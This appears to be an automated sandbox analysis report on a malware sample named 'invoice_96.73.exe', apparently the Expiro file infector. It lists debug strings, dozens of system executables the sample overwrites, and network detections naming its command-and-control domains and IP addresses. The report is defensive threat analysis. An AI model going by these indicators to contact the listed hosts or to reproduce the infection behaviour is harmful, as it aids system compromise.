      Source: Binary string: dllhost.pdb source: armsvc.exe, 00000002.00000003.367049067.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.365429187.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.366371363.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.560950448.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.557364709.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\tnameserv_objs\tnameserv.pdb source: armsvc.exe, 00000002.00000003.489549395.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.487933840.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WMPNetwk.pdb source: armsvc.exe, 00000002.00000003.417582553.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.418441175.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: SearchIndexer.pdb source: armsvc.exe, 00000002.00000003.420532553.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\kinit_objs\kinit.pdb source: armsvc.exe, 00000002.00000003.464557449.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.465983373.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\unpackexe\unpack200.pdb source: armsvc.exe, 00000002.00000003.490456860.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, unpack200.exe.2.dr
      Source: Binary string: chrome_wow_helper.pdb source: armsvc.exe, 00000002.00000003.573489148.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ieetwcollector.pdb source: armsvc.exe, 00000002.00000003.378562857.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.378697876.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroBroker.pdbsTT6 source: armsvc.exe, 00000002.00000003.494060398.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: armsvc.exe, 00000002.00000003.484025303.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.482732897.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.543127259.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\delivery\x64\ship\0\ose.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.549948881.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
      Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000002.00000003.389231981.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390086664.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.389367971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb] source: DW20.EXE.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp, DW20.EXE.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\orbd_objs\orbd.pdb source: armsvc.exe, 00000002.00000003.471060222.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.472762066.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vds.pdbH source: armsvc.exe, 00000002.00000003.397013643.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.396407942.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.410168312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wbengine.pdb@SH source: armsvc.exe, 00000002.00000003.406707369.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.408514012.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.2.dr
      Source: Binary string: ALG.pdb source: invoice_96.73.exe, 00000000.00000003.353143094.0000000002990000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349561520.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349725788.0000000003690000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jabswitch\jabswitch.pdb source: armsvc.exe, 00000002.00000003.444147951.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb00 source: armsvc.exe, 00000002.00000003.557364709.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000002.00000003.383128547.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.383373251.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\keytool_objs\keytool.pdb source: armsvc.exe, 00000002.00000003.461065533.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.464249013.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Eula.pdb source: armsvc.exe, 00000002.00000003.546479748.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmid_objs\rmid.pdb source: armsvc.exe, 00000002.00000003.482423318.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.480866013.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000002.00000003.377542137.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroRd32Info.pdb source: armsvc.exe, 00000002.00000003.525307374.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java-rmi_objs\java-rmi.pdb source: armsvc.exe, 00000002.00000003.447269346.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.449170797.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, java-rmi.exe.2.dr
      Source: Binary string: mscorsvw.pdb source: armsvc.exe, 00000002.00000003.358919059.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.357934504.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.360197624.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356595540.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356855501.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.357840917.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.359130916.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: Reader_SL.pdb..) source: armsvc.exe, 00000002.00000003.562770680.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, reader_sl.exe.2.dr
      Source: Binary string: E:\r\ws\St_Make\code\build\win\results\FlashPlayerUpdateService\Release\Win32\FlashPlayerUpdateService.pdb source: invoice_96.73.exe, 00000000.00000003.347332988.0000000002A90000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\policytool_objs\policytool.pdb source: armsvc.exe, 00000002.00000003.480547768.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.476508666.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000002.00000003.391469846.0000000002030000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391488401.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392623971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391662820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391640685.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392746098.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391569645.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391549027.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391679575.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: RdrServicesUpdater.pdb;; source: armsvc.exe, 00000002.00000003.505647536.0000000001520000.00000004.00001000.00020000.00000000.sdmp, RdrServicesUpdater.exe.2.dr
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb source: armsvc.exe, 00000002.00000003.435805311.0000000002090000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 00000002.00000003.431900302.0000000002150000.00000004.00001000.00020000.00000000.sdmp, DW20.EXE.2.dr
      Source: Binary string: ieetwcollector.pdbH source: armsvc.exe, 00000002.00000003.378562857.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.378697876.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\toolkit\components\maintenanceservice\maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.382555464.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java_objs\java.pdb source: armsvc.exe, 00000002.00000003.449717212.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, java.exe.2.dr
      Source: Binary string: TextExtractor.pdb source: armsvc.exe, 00000002.00000003.528202244.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ehRecvr.pdb source: armsvc.exe, 00000002.00000003.367743186.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: y\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 00000002.00000003.388508123.00000000020C0000.00000004.00001000.00020000.00000000.sdmp

      Spreading

      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\wbem\WmiApSrv.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\CCleaner\CCleaner64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\ssvagent.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\ehome\ehsched.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exe | System file written: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\jabswitch.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\vds.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exe | System file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exe | System file written: C:\Windows\System32\alg.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\rmid.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\ieetwcollector.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\snmptrap.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\Locator.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\java-rmi.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\SysWOW64\perfhost.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\msiexec.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\javacpl.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\kinit.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\javaw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\VSSVC.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\wbengine.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\ktab.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\tnameserv.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\jp2launcher.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\SearchIndexer.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\policytool.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\ehome\ehrecvr.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\java.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\javaws.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\orbd.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\dllhost.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\jjs.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\FXSSVC.exe
      Source: C:\Users\user\Desktop\invoice_96.73.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\servertool.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\unpack200.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\sppsvc.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\CCleaner\CCleaner.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Windows\System32\msdtc.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\klist.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\pack200.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | System file written: C:\Program Files\Java\jre1.8.0_121\bin\rmiregistry.exe
      Source: C:\Windows\ehome\ehrecvr.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
      Source: C:\Windows\ehome\ehrecvr.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs
      Source: C:\Windows\ehome\ehrecvr.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid
      Source: C:\Windows\ehome\ehrecvr.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
      Source: C:\Windows\ehome\ehrecvr.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32
      Source: C:\Windows\ehome\ehrecvr.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler
      Source: C:\Windows\ehome\ehrecvr.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
      Source: C:\Windows\ehome\ehrecvr.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\

      Networking

      Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.22:52781 -> 8.8.8.8:53
      Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.22:49176 -> 47.129.31.212:80
      Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.22:49881 -> 8.8.8.8:53
      Source: unknown | DNS traffic detected: English language letter frequency does not match the domain names
      Source: unknown | Network traffic detected: DNS query count 37
      Source: Joe Sandbox View | IP Address: 44.221.84.105
      Source: Joe Sandbox View | IP Address: 34.246.200.160
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.22:49176
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.22:49176
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.22:49187
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.22:49187
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.22:49182
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.22:49182
      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.22:49183
      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.22:49183
